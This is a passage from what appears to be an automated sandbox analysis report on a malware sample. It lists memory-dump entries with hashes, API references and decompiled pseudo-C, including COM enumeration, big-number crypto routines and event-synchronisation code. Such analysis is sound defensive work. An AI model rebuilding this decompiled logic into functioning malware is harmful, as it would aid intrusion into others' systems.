                  • Instruction Fuzzy Hash: 7B612BB6D0021A9FDB15CFA8C8815DDFBF9EF48350B244169E815E7300DB35AE518F94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RtlEncodePointer.NTDLL(00000000), ref: 70296A43
                  • CatchIt.LIBVCRUNTIME ref: 70296B29
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: CatchEncodePointer
                  • String ID: MOC$RCC
                  • API String ID: 1435073870-2084237596
                  • Opcode ID: 69758cb0d1cf3d841eb63827523b49ca6477ae4856f4270b8b2de6d4649e8056
                  • Instruction ID: 892343692f729aa20386d4e9c8313d5d7f91e9f58d3e373dd233406d499e406a
                  • Opcode Fuzzy Hash: 69758cb0d1cf3d841eb63827523b49ca6477ae4856f4270b8b2de6d4649e8056
                  • Instruction Fuzzy Hash: DB414B7291020AAFDF06CF94CD85EAEBBB5FF48314F158159F90AB6210E335A960DF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: _strrchr
                  • String ID:
                  • API String ID: 3213747228-0
                  • Opcode ID: dea6f633a265625f5a1b94ac9983c9ac132fdbc5cbf7662bf455da5b77896b96
                  • Instruction ID: 2b5930c828fa93f40b7967926650d715502435b197d8b2a7f15fd9a840862b67
                  • Opcode Fuzzy Hash: dea6f633a265625f5a1b94ac9983c9ac132fdbc5cbf7662bf455da5b77896b96
                  • Instruction Fuzzy Hash: CBB116B39042469FDB06CF6CC8417AEBBF5EF55300F2481AADC46BB245DA389D59CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: AdjustPointer
                  • String ID:
                  • API String ID: 1740715915-0
                  • Opcode ID: f1f59f9964c05081db8a1be3b94064d59a2542cd53179bdae29f364eef4edc71
                  • Instruction ID: 8f456cfbcb0c30f5b4469da190453300a47e8fa33941d082dc8e45c405fe5916
                  • Opcode Fuzzy Hash: f1f59f9964c05081db8a1be3b94064d59a2542cd53179bdae29f364eef4edc71
                  • Instruction Fuzzy Hash: BF51C0B3A212029FDB168F51D849B6E77F9EF00310F51412DE85667694E735EC60CB9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 46%
                  			E00DC14BD(intOrPtr* __eax) {
                  				void* _v8;
                  				WCHAR* _v12;
                  				void* _v16;
                  				char _v20;
                  				void* _v24;
                  				intOrPtr _v28;
                  				void* _v32;
                  				intOrPtr _v40;
                  				short _v48;
                  				intOrPtr _v56;
                  				short _v64;
                  				intOrPtr* _t54;
                  				intOrPtr* _t56;
                  				intOrPtr _t57;
                  				intOrPtr* _t58;
                  				intOrPtr* _t60;
                  				void* _t61;
                  				intOrPtr* _t63;
                  				intOrPtr* _t65;
                  				intOrPtr* _t67;
                  				intOrPtr* _t69;
                  				intOrPtr* _t71;
                  				intOrPtr* _t74;
                  				intOrPtr* _t76;
                  				intOrPtr _t78;
                  				intOrPtr* _t82;
                  				intOrPtr* _t86;
                  				intOrPtr _t102;
                  				intOrPtr _t108;
                  				void* _t117;
                  				void* _t121;
                  				void* _t122;
                  				intOrPtr _t129;
                  
                  				_t122 = _t121 - 0x3c;
                  				_push( &_v8);
                  				_push(__eax);
                  				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                  				if(_t117 >= 0) {
                  					_t54 = _v8;
                  					_t102 =  *0xdcd230; // 0x434a5a8
                  					_t5 = _t102 + 0xdce038; // 0x3050f485
                  					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                  					_t56 = _v8;
                  					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                  					if(_t117 >= 0) {
                  						__imp__#2(0xdcc2c8);
                  						_v28 = _t57;
                  						if(_t57 == 0) {
                  							_t117 = 0x8007000e;
                  						} else {
                  							_t60 = _v32;
                  							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                  							_t86 = __imp__#6;
                  							_t117 = _t61;
                  							if(_t117 >= 0) {
                  								_t63 = _v24;
                  								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                  								if(_t117 >= 0) {
                  									_t129 = _v20;
                  									if(_t129 != 0) {
                  										_v64 = 3;
                  										_v48 = 3;
                  										_v56 = 0;
                  										_v40 = 0;
                  										if(_t129 > 0) {
                  											while(1) {
                  												_t67 = _v24;
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												_t122 = _t122;
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                  												if(_t117 < 0) {
                  													goto L16;
                  												}
                  												_t69 = _v8;
                  												_t108 =  *0xdcd230; // 0x434a5a8
                  												_t28 = _t108 + 0xdce0bc; // 0x3050f1ff
                  												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                  												if(_t117 >= 0) {
                  													_t74 = _v16;
                  													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                  													if(_t117 >= 0 && _v12 != 0) {
                  														_t78 =  *0xdcd230; // 0x434a5a8
                  														_t33 = _t78 + 0xdce078; // 0x76006f
                  														if(lstrcmpW(_v12, _t33) == 0) {
                  															_t82 = _v16;
                  															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                  														}
                  														 *_t86(_v12);
                  													}
                  													_t76 = _v16;
                  													 *((intOrPtr*)( *_t76 + 8))(_t76);
                  												}
                  												_t71 = _v8;
                  												 *((intOrPtr*)( *_t71 + 8))(_t71);
                  												_v40 = _v40 + 1;
                  												if(_v40 < _v20) {
                  													continue;
                  												}
                  												goto L16;
                  											}
                  										}
                  									}
                  								}
                  								L16:
                  								_t65 = _v24;
                  								 *((intOrPtr*)( *_t65 + 8))(_t65);
                  							}
                  							 *_t86(_v28);
                  						}
                  						_t58 = _v32;
                  						 *((intOrPtr*)( *_t58 + 8))(_t58);
                  					}
                  				}
                  				return _t117;
                  			}


                  APIs
                  • SysAllocString.OLEAUT32(00DCC2C8), ref: 00DC150D
                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00DC15EF
                  • SysFreeString.OLEAUT32(00000000), ref: 00DC1608
                  • SysFreeString.OLEAUT32(?), ref: 00DC1637
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: String$Free$Alloclstrcmp
                  • String ID:
                  • API String ID: 1885612795-0
                  • Opcode ID: d2869b40e5f474b5b892de2a451072dc02b2d97cf2c7843186bc17eeb2755130
                  • Instruction ID: 69116b3abb0c8ddfd9af0a3ab49faae7b34dbf43b6c8207c5be091eea3127cd2
                  • Opcode Fuzzy Hash: d2869b40e5f474b5b892de2a451072dc02b2d97cf2c7843186bc17eeb2755130
                  • Instruction Fuzzy Hash: 5D512875D0051AEFCB01DFA8C988DAEF7B9EF89704B188598E905EB211D771AD01CBB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SysAllocString.OLEAUT32(00000000), ref: 00DC496C
                  • SysFreeString.OLEAUT32(00000000), ref: 00DC4A4F
                    • Part of subcall function 00DC14BD: SysAllocString.OLEAUT32(00DCC2C8), ref: 00DC150D
                  • SafeArrayDestroy.OLEAUT32(?), ref: 00DC4AA3
                  • SysFreeString.OLEAUT32(?), ref: 00DC4AB1
                    • Part of subcall function 00DC13AD: Sleep.KERNEL32(000001F4), ref: 00DC13F5
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                  • String ID:
                  • API String ID: 3193056040-0
                  • Opcode ID: 928e3726d59cc18fca3ecbde68766c6d74d848649e998df4c7ee984617450adf
                  • Instruction ID: dd09a5e857c2513b0d98195e75187f42e82cf3848be4d4c3c020e4937a5fd2f0
                  • Opcode Fuzzy Hash: 928e3726d59cc18fca3ecbde68766c6d74d848649e998df4c7ee984617450adf
                  • Instruction Fuzzy Hash: B351FB7690060BAFCB00DFE4C894DAEB7B6FF88344B19896CE515EB210D7319D45CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E00DC44C2(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				signed int _v16;
                  				void _v92;
                  				void _v236;
                  				void* _t55;
                  				unsigned int _t56;
                  				signed int _t66;
                  				signed int _t74;
                  				void* _t76;
                  				signed int _t79;
                  				void* _t81;
                  				void* _t92;
                  				void* _t96;
                  				signed int* _t99;
                  				signed int _t101;
                  				signed int _t103;
                  				void* _t107;
                  
                  				_t92 = _a12;
                  				_t101 = __eax;
                  				_t55 = E00DC43C6(_a16, _t92);
                  				_t79 = _t55;
                  				if(_t79 == 0) {
                  					L18:
                  					return _t55;
                  				}
                  				_t56 =  *(_t92 + _t79 * 4 - 4);
                  				_t81 = 0;
                  				_t96 = 0x20;
                  				if(_t56 == 0) {
                  					L4:
                  					_t97 = _t96 - _t81;
                  					_v12 = _t96 - _t81;
                  					E00DCA966(_t79,  &_v236);
                  					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00DC8B07(_t101,  &_v236, _a8, _t96 - _t81);
                  					E00DC8B07(_t79,  &_v92, _a12, _t97);
                  					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                  					_t66 = E00DCA966(_t101,  &E00DCD168);
                  					_t103 = _t101 - _t79;
                  					_a8 = _t103;
                  					if(_t103 < 0) {
                  						L17:
                  						E00DCA966(_a16, _a4);
                  						E00DC3A1E(_t79,  &_v236, _a4, _t97);
                  						memset( &_v236, 0, 0x8c);
                  						_t55 = memset( &_v92, 0, 0x44);
                  						goto L18;
                  					}
                  					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                  					do {
                  						if(_v8 != 0xffffffff) {
                  							_push(1);
                  							_push(0);
                  							_push(0);
                  							_push( *_t99);
                  							L00DCAEE0();
                  							_t74 = _t66 +  *(_t99 - 4);
                  							asm("adc edx, esi");
                  							_push(0);
                  							_push(_v8 + 1);
                  							_push(_t92);
                  							_push(_t74);
                  							L00DCAEDA();
                  							if(_t92 > 0 || _t74 > 0xffffffff) {
                  								_t74 = _t74 | 0xffffffff;
                  								_v16 = _v16 & 0x00000000;
                  							}
                  						} else {
                  							_t74 =  *_t99;
                  						}
                  						_t106 = _t107 + _a8 * 4 - 0xe8;
                  						_a12 = _t74;
                  						_t76 = E00DC47A0(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                  						while(1) {
                  							 *_t99 =  *_t99 - _t76;
                  							if( *_t99 != 0) {
                  								goto L14;
                  							}
                  							L13:
                  							_t92 =  &_v92;
                  							if(E00DC337A(_t79, _t92, _t106) < 0) {
                  								break;
                  							}
                  							L14:
                  							_a12 = _a12 + 1;
                  							_t76 = E00DC72D3(_t79,  &_v92, _t106, _t106);
                  							 *_t99 =  *_t99 - _t76;
                  							if( *_t99 != 0) {
                  								goto L14;
                  							}
                  							goto L13;
                  						}
                  						_a8 = _a8 - 1;
                  						_t66 = _a12;
                  						_t99 = _t99 - 4;
                  						 *(_a8 * 4 +  &E00DCD168) = _t66;
                  					} while (_a8 >= 0);
                  					_t97 = _v12;
                  					goto L17;
                  				}
                  				while(_t81 < _t96) {
                  					_t81 = _t81 + 1;
                  					_t56 = _t56 >> 1;
                  					if(_t56 != 0) {
                  						continue;
                  					}
                  					goto L4;
                  				}
                  				goto L4;
                  			}


                  APIs
                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00DC456F
                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00DC4585
                  • memset.NTDLL ref: 00DC4625
                  • memset.NTDLL ref: 00DC4635
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: memset$_allmul_aulldiv
                  • String ID:
                  • API String ID: 3041852380-0
                  • Opcode ID: 17b60a711549b5becc7b54a429766e97ca4feaf7d68f5bb8f31d26c9ecc802d6
                  • Instruction ID: 4bf85dda8a5c13978677f4890138e020986ad91c6c9f8fe54b19bb6c1db71eeb
                  • Opcode Fuzzy Hash: 17b60a711549b5becc7b54a429766e97ca4feaf7d68f5bb8f31d26c9ecc802d6
                  • Instruction Fuzzy Hash: 82417D71A0024AABDB10DFA8CC51FEE7779EF55310F10852DF919A7180DB709E558B70
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 57%
                  			E00DC43A3(void* __eax) {
                  				long _v8;
                  				char _v12;
                  				char _v16;
                  				intOrPtr _v20;
                  				void* _v24;
                  				void* __esi;
                  				void* _t41;
                  				char* _t42;
                  				long _t43;
                  				intOrPtr _t47;
                  				intOrPtr* _t48;
                  				char _t50;
                  				char* _t55;
                  				long _t56;
                  				intOrPtr* _t57;
                  				void* _t60;
                  				void* _t61;
                  				void* _t68;
                  				void* _t72;
                  				void* _t73;
                  				void* _t74;
                  				void* _t78;
                  
                  				_t72 = __eax;
                  				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                  					L2:
                  					_t41 = _t72;
                  					_pop(_t73);
                  					_t74 = _t41;
                  					_t42 =  &_v12;
                  					_v8 = 0;
                  					_v16 = 0;
                  					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
                  					if(_t42 == 0) {
                  						_t43 = GetLastError();
                  						_v8 = _t43;
                  						if(_t43 == 0x2efe) {
                  							_v8 = 0;
                  							goto L29;
                  						}
                  					} else {
                  						if(_v12 == 0) {
                  							L29:
                  							 *((intOrPtr*)(_t74 + 0x30)) = 0;
                  						} else {
                  							_push( &_v24);
                  							_push(1);
                  							_push(0);
                  							if( *0xdcd138() != 0) {
                  								_v8 = 8;
                  							} else {
                  								_t47 = E00DC75C4(0x1000);
                  								_v20 = _t47;
                  								if(_t47 == 0) {
                  									_v8 = 8;
                  								} else {
                  									goto L8;
                  									do {
                  										while(1) {
                  											L8:
                  											_t50 = _v12;
                  											if(_t50 >= 0x1000) {
                  												_t50 = 0x1000;
                  											}
                  											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
                  											if(_t50 == 0) {
                  												break;
                  											}
                  											_t57 = _v24;
                  											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
                  											_t18 =  &_v12;
                  											 *_t18 = _v12 - _v16;
                  											if( *_t18 != 0) {
                  												continue;
                  											} else {
                  											}
                  											L14:
                  											if(WaitForSingleObject( *0xdcd224, 0) != 0x102) {
                  												_v8 = 0x102;
                  											} else {
                  												_t55 =  &_v12;
                  												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
                  												if(_t55 != 0) {
                  													goto L19;
                  												} else {
                  													_t56 = GetLastError();
                  													_v8 = _t56;
                  													if(_t56 == 0x2f78 && _v12 == 0) {
                  														_v8 = 0;
                  														goto L19;
                  													}
                  												}
                  											}
                  											L22:
                  											E00DC4C31(_v20);
                  											if(_v8 == 0) {
                  												_v8 = E00DC4036(_v24, _t74);
                  											}
                  											goto L25;
                  										}
                  										_v8 = GetLastError();
                  										goto L14;
                  										L19:
                  									} while (_v12 != 0);
                  									goto L22;
                  								}
                  								L25:
                  								_t48 = _v24;
                  								 *((intOrPtr*)( *_t48 + 8))(_t48);
                  							}
                  						}
                  					}
                  					return _v8;
                  				} else {
                  					_t60 = E00DC7F7F(__eax);
                  					if(_t60 != 0) {
                  						return _t60;
                  					} else {
                  						goto L2;
                  					}
                  				}
                  			}


                  APIs
                  • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00DC6CD4,00000000,?), ref: 00DC6EA7
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00DC6CD4,00000000,?,?), ref: 00DC6EC7
                    • Part of subcall function 00DC7F7F: wcstombs.NTDLL ref: 00DC803F
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: ErrorLastObjectSingleWaitwcstombs
                  • String ID:
                  • API String ID: 2344289193-0
                  • Opcode ID: f3d99417383938b71f6a2b152aef556cf33c3ad18ba2ecd81e86800343aafc8d
                  • Instruction ID: e673ff104367f0c52f087d745ceb222eda5dea4e51937f850510f9714d4e89f8
                  • Opcode Fuzzy Hash: f3d99417383938b71f6a2b152aef556cf33c3ad18ba2ecd81e86800343aafc8d
                  • Instruction Fuzzy Hash: 7A41F9B590020BEFDF209FA5D984EADBBB9EF04345B64846EE501E3250D730DE419B30
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SysAllocString.OLEAUT32(80000002), ref: 00DC88B8
                  • SysAllocString.OLEAUT32(00DCA412), ref: 00DC88FB
                  • SysFreeString.OLEAUT32(00000000), ref: 00DC890F
                  • SysFreeString.OLEAUT32(00000000), ref: 00DC891D
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: String$AllocFree
                  • String ID:
                  • API String ID: 344208780-0
                  • Opcode ID: 505229c1a624dbd7d7f0b6a998176890f4aa8ea1ea43b6f72b4a286ffdb34b4e
                  • Instruction ID: 76502c8c756e31741a7b15cbecff0c87b68c0d2c6fd4e7d28475558fdca3ee88
                  • Opcode Fuzzy Hash: 505229c1a624dbd7d7f0b6a998176890f4aa8ea1ea43b6f72b4a286ffdb34b4e
                  • Instruction Fuzzy Hash: 4D311C7190020AEF8B05DF98D884DAEBBB9FF48341B14842EE50AD7210DB359A45DF76
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E00DC4838(signed int _a4, signed int* _a8) {
                  				void* __ecx;
                  				void* __edi;
                  				signed int _t6;
                  				intOrPtr _t8;
                  				intOrPtr _t12;
                  				void* _t25;
                  				void* _t26;
                  				signed int* _t27;
                  				signed short* _t28;
                  				CHAR* _t30;
                  				long _t31;
                  				intOrPtr* _t32;
                  
                  				_t6 =  *0xdcd228; // 0xbd092303
                  				_t32 = _a4;
                  				_a4 = _t6 ^ 0xd05b5869;
                  				_t8 =  *0xdcd230; // 0x434a5a8
                  				_t3 = _t8 + 0xdce84d; // 0x61636f4c
                  				_t25 = 0;
                  				_t30 = E00DC4200(_t3, 1);
                  				if(_t30 != 0) {
                  					_t25 = CreateEventA(0xdcd234, 1, 0, _t30);
                  					E00DC4C31(_t30);
                  				}
                  				_t12 =  *0xdcd214; // 0x4000000a
                  				if(_t12 != 6 || _t12 < 2) {
                  					if( *_t32 != 0 && E00DC31DD() == 0) {
                  						_t28 =  *0xdcd104( *_t32, 0x20);
                  						if(_t28 != 0) {
                  							 *_t28 =  *_t28 & 0x00000000;
                  							_t28 =  &(_t28[1]);
                  						}
                  						_t31 = E00DC3267(0, _t28,  *_t32, 0);
                  						if(_t31 == 0) {
                  							if(_t25 == 0) {
                  								goto L21;
                  							}
                  							_t31 = WaitForSingleObject(_t25, 0x4e20);
                  							if(_t31 == 0) {
                  								goto L19;
                  							}
                  						}
                  					}
                  					goto L11;
                  				} else {
                  					L11:
                  					_t27 = _a8;
                  					if(_t27 != 0) {
                  						 *_t27 =  *_t27 | 0x00000001;
                  					}
                  					_t31 = E00DC7E3F(_t32, _t26);
                  					if(_t31 == 0 && _t25 != 0) {
                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                  					}
                  					if(_t27 != 0 && _t31 != 0) {
                  						 *_t27 =  *_t27 & 0xfffffffe;
                  					}
                  					L19:
                  					if(_t25 != 0) {
                  						CloseHandle(_t25);
                  					}
                  					L21:
                  					return _t31;
                  				}
                  			}
















                  APIs
                    • Part of subcall function 00DC4200: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,7742C740,00DC70CE,74666F53,00000000,?,00000000,?,?,00DC79D7), ref: 00DC4236
                    • Part of subcall function 00DC4200: lstrcpy.KERNEL32(00000000,00000000), ref: 00DC425A
                    • Part of subcall function 00DC4200: lstrcat.KERNEL32(00000000,00000000), ref: 00DC4262
                  • CreateEventA.KERNEL32(00DCD234,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00DC546D,?,?,?), ref: 00DC4877
                    • Part of subcall function 00DC4C31: HeapFree.KERNEL32(00000000,00000000,00DC5130,00000000,?,?,00000000,?,?,?,?,?,?,00DC8792,00000000), ref: 00DC4C3D
                  • WaitForSingleObject.KERNEL32(00000000,00004E20,00DC546D,00000000,?,00000000,?,00DC546D,?,?,?,?,?,?,?,00DC38C3), ref: 00DC48D5
                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00DC546D,?,?,?), ref: 00DC4903
                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00DC546D,?,?,?), ref: 00DC491B
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                  • String ID:
                  • API String ID: 73268831-0
                  • Opcode ID: fa7135ab29d2d061318eecc31a4eb3de05257ea5a816e4816b8ca2bad559ee65
                  • Instruction ID: 68caadb91ed58c5dd23cc3ddb19e763d49d0c278fbf343339bc8d9e99b311494
                  • Opcode Fuzzy Hash: fa7135ab29d2d061318eecc31a4eb3de05257ea5a816e4816b8ca2bad559ee65
                  • Instruction Fuzzy Hash: 3F21A1366017639BD7215BA89CA5F5BB6E9EF48711F09062CFE05DB291DB70CC018AB4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 39%
                  			E00DC53BE(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                  				intOrPtr _v12;
                  				void* _v16;
                  				void* _v28;
                  				char _v32;
                  				void* __esi;
                  				void* _t29;
                  				void* _t38;
                  				signed int* _t39;
                  				void* _t40;
                  
                  				_t36 = __ecx;
                  				_v32 = 0;
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_v12 = _a4;
                  				_t38 = E00DC8A0C(__ecx,  &_v32);
                  				if(_t38 != 0) {
                  					L12:
                  					_t39 = _a8;
                  					L13:
                  					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                  						_t23 =  &(_t39[1]);
                  						if(_t39[1] != 0) {
                  							E00DC5758(_t23);
                  						}
                  					}
                  					return _t38;
                  				}
                  				if(E00DC6D86(0x40,  &_v16) != 0) {
                  					_v16 = 0;
                  				}
                  				_t40 = CreateEventA(0xdcd234, 1, 0,  *0xdcd2f8);
                  				if(_t40 != 0) {
                  					SetEvent(_t40);
                  					Sleep(0xbb8);
                  					CloseHandle(_t40);
                  				}
                  				_push( &_v32);
                  				if(_a12 == 0) {
                  					_t29 = E00DC57B9(_t36);
                  				} else {
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_t29 = E00DCA360(_t36);
                  				}
                  				_t41 = _v16;
                  				_t38 = _t29;
                  				if(_v16 != 0) {
                  					E00DC30BF(_t41);
                  				}
                  				if(_t38 != 0) {
                  					goto L12;
                  				} else {
                  					_t39 = _a8;
                  					_t38 = E00DC4838( &_v32, _t39);
                  					goto L13;
                  				}
                  			}













                  APIs
                  • CreateEventA.KERNEL32(00DCD234,00000001,00000000,00000040,?,?,74B5F710,00000000,74B5F730,?,?,?,?,00DC38C3,?,00000001), ref: 00DC540F
                  • SetEvent.KERNEL32(00000000,?,?,?,?,00DC38C3,?,00000001,00DC7A05,00000002,?,?,00DC7A05), ref: 00DC541C
                  • Sleep.KERNEL32(00000BB8,?,?,?,?,00DC38C3,?,00000001,00DC7A05,00000002,?,?,00DC7A05), ref: 00DC5427
                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00DC38C3,?,00000001,00DC7A05,00000002,?,?,00DC7A05), ref: 00DC542E
                    • Part of subcall function 00DC57B9: WaitForSingleObject.KERNEL32(00000000,?,?,?,00DC544E,?,00DC544E,?,?,?,?,?,00DC544E,?), ref: 00DC5893
                    • Part of subcall function 00DC57B9: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00DC544E,?,?,?,?,?,00DC38C3,?), ref: 00DC58BB
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: CloseEvent$CreateHandleObjectSingleSleepWait
                  • String ID:
                  • API String ID: 467273019-0
                  • Opcode ID: 8a2621ef8d7464ca8a0f045b1f046f8c8f6feecd35de2b5d852e7b169fb2cf6b
                  • Instruction ID: 91156d8a6320c3014970a5c9986a6aee696ce4e73d6de5fec638e0adc34038e7
                  • Opcode Fuzzy Hash: 8a2621ef8d7464ca8a0f045b1f046f8c8f6feecd35de2b5d852e7b169fb2cf6b
                  • Instruction Fuzzy Hash: DE21B37290061BEBCB10AFE49885EAEB369EB04391B09852DFA11E7104D730EDC18BB1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 702A0B95: _free.LIBCMT ref: 702A0BA3
                    • Part of subcall function 702A154B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,702A6B70,?,00000000,00000000), ref: 702A15ED
                  • GetLastError.KERNEL32 ref: 702A061A
                  • __dosmaperr.LIBCMT ref: 702A0621
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 702A0660
                  • __dosmaperr.LIBCMT ref: 702A0667
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                  • String ID:
                  • API String ID: 167067550-0
                  • Opcode ID: a5bb2cd70a01f1fff53d4da02d85feaec8ccfcbfca70c4bb8970d8c13a3fd122
                  • Instruction ID: fb7fd3d1092a0505656d9efe75933581e52c3722125faa7d48b5bf42c1de72ec
                  • Opcode Fuzzy Hash: a5bb2cd70a01f1fff53d4da02d85feaec8ccfcbfca70c4bb8970d8c13a3fd122
                  • Instruction Fuzzy Hash: 00214CB3A00206AFD7519F7689C1A5FB7AEEE447687508519FD2AD7150DF30FD308AA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
